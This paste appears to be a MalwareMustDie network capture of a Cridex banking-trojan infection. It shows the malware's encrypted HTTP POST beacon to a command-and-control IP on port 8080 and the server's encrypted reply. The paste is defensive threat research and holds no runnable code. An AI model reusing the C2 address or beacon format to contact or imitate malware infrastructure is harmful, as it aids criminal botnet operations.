SHARE
TWEET

MalwareMustDie - Cridex Network analysis

MalwareMustDie Nov 25th, 2012 163 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ===========================================
  2. MalwareMustDie - Cridex Network analysis
  3. Facebook --> PluginDetect 0.7.9 --> BHEK2
  4. @unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
  5. ===========================================
  6.  
  7. // TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  8.  
  9. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  10. Accept: */*
  11. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  12. Host: 180.235.150.72:8080
  13. Content-Length: 347
  14. Connection: Keep-Alive
  15. Cache-Control: no-cache
  16. .....T*K..N..t...H......I:...{....X{.C..l.?su.{.N....29..%.....<v..S..
  17. z..-D/...y. 7.J0.!>...i..Z..K....}....k.9.i|....IGJ....H..e
  18. ...',.H.%..$..Y6....t..J..j....NSpb3p...:..J.....B?..v.)....C.]c.J+.o.
  19. ..~..I&]6pf.Z....:...K....'y}EC....J.I<2.5..O..KX,u-R..k..f.i2..#KZg."
  20. ..2..G\..~5"|..B...e........A.O..N..ic4..0...I......C.....UG..m..g.vt+
  21. /.nw,l.HTTP/1.1 200 OK
  22.  
  23. // Receiving a long response below:
  24.  
  25. Server: nginx/1.0.10
  26. Date: Sun, 25 Nov 2012 13:39:39 GMT
  27. Content-Type: text/html; charset=UTF-8
  28. Transfer-Encoding: chunked
  29. Connection: keep-alive
  30. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  31. Vary: Accept-Encoding
  32.  
  33. f3b
  34. /..PS..~:Pk1.$...|a8......$....S.yb....p......d.VR..+P....... .P*.&+.i
  35. .d..>.....tM.c.B+..W..^.2.......X..qr.|I.zY`0N.{.O.WU...4,.9..^kK
  36. 2U...`........p..N..v...:O\dy.:.W.b."...]..Y...0.l.......m%.).=..N=..
  37.   :
  38.   long one...
  39.   :
  40. zL..!..B............7..PS3..x...}.Q.s.4Ntm5K;t~p..0.....2%../*...Cd.J.
  41. ...!D..5Q8...'E>-..5.*A...B6.h..=X.z.Y......[..;-....vm.h.aN.RX.(V...!
  42. ..@a....M.@.+.ji.....C..U.S.e_...^......g?.<..-..^.xe.....`........%..
  43. Z.2..../.
  44. 0
  45.  
  46. // #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top